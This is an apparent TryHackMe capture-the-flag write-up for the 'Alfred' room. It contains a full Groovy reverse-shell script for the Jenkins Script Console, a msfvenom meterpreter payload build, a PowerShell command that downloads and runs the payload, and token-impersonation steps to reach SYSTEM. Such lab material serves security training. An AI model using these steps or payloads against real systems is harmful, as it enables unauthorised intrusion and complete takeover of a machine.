TryHackMe: Alfred Room Writeup
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. https://www.tryhackme.com/room/alfred
Task 1: Initial Access
How many ports are open? (TCP only)
We do the usual nmap scan here (-sV for service versions, --script vuln for the NSE vulnerability scripts), saving the output so we can grep it afterwards:
export rhost=1.1.1.1   # target machine IP
nmap -sV --script vuln $rhost | tee nmap-$rhost.out
grep open nmap-$rhost.out

3
What is the username and password for the log in panel (in the format username:password)?
In the browser, go to http://$rhost:8080
and we see a Jenkins login page. Try the first thing that comes to mind, the default admin:admin, and we’re in!

admin:admin
What is the user.txt flag?
Click around the Jenkins pages. There is more than one way to get a reverse shell; I find the easiest is to use the Script Console. (This doesn’t really follow the steps in the task description, which involves creating a new Jenkins build that runs a Windows batch command.)
In the left sidebar, navigate to “Manage Jenkins” > “Script Console”, or just go to http://$rhost:8080/script

As explained on the page, the script console allows us to run “an arbitrary Groovy script”, and it runs with the privileges of the Jenkins service, nice. Let’s first start a netcat listener.
nc -lvnp 4444
Now let’s google for a Groovy reverse shell script. We’ll find one here (use Alternative 1, which is “more stealthy”). Change the host to your machine’s IP and the port to the one netcat is listening on (4444 here), then paste it in the Script Console and run. Almost immediately, we’ll see a reverse shell in the listener.
Thread.start {
    String host = "1.1.1.1";   // your machine's IP (where nc is listening)
    int port = 4444;           // the port nc is listening on
    String cmd = "cmd.exe";
    // Spawn cmd.exe with stderr merged into stdout, then connect back to the listener.
    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s = new Socket(host, port);
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    // Pump bytes both ways until the socket closes or cmd.exe exits.
    while (!s.isClosed()) {
        while (pi.available() > 0) so.write(pi.read());
        while (pe.available() > 0) so.write(pe.read());
        while (si.available() > 0) po.write(si.read());
        so.flush(); po.flush();
        Thread.sleep(50);
        try { p.exitValue(); break; } catch (Exception e) {}
    }
    p.destroy();
    s.close();
}


Task 2: Switching Shells
What is the final size of the exe payload that you generated?
Let’s generate the payload! The LHOST and LPORT baked into it must match the handler we start in Task 3, and msfvenom prints the size as “Final size of exe file”.
export lhost=1.1.1.1   # your local IP
export lport=4445      # local port the handler will listen on
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$lhost LPORT=$lport -f exe -o alfred.exe

73802
Task 3: Privilege Escalation
To check which tokens are available, enter the list_tokens -g. … What is the output when you run the getuid command?
Now we need to get a reverse shell again, this time with Metasploit. (Note: the steps here deviate from the task description.)
To get the payload onto the remote machine, we need to start an HTTP server. On our local machine, run this from the directory containing alfred.exe (it serves the current directory on port 8000):
python3 -m http.server
Then in another session, start Metasploit and create a listener. LHOST and LPORT must be the same values we baked into alfred.exe:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1   # your machine IP ($lhost above)
set LPORT 4445      # the $lport used with msfvenom
run -j
Now in the remote shell, run this to download the payload that we created earlier (remember to change the host; the file lands in the Jenkins service’s working directory):
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://1.1.1.1:8000/alfred.exe','alfred.exe')"
Then start it:
powershell -c Start-Process "alfred.exe"
We should now have a meterpreter session!

Interact with the session, load the incognito module, list the delegation tokens and impersonate the Administrators one. (Incognito can only do this because the Jenkins service account holds SeImpersonatePrivilege; without it the impersonation fails.)
use incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
getuid

NT AUTHORITY\SYSTEM
Read the root.txt file at C:\Windows\System32\config
Now we need to migrate to a SYSTEM-owned process as described in the task description (Windows checks the process’s primary token for many operations, not the impersonated one, so moving into services.exe gives us a real SYSTEM context):
ps services
migrate <PID of services.exe>

Since services.exe runs out of C:\Windows\System32, a successful migration leaves our working directory there, and the flag sits in the config subdirectory. So let’s just check out the flag!
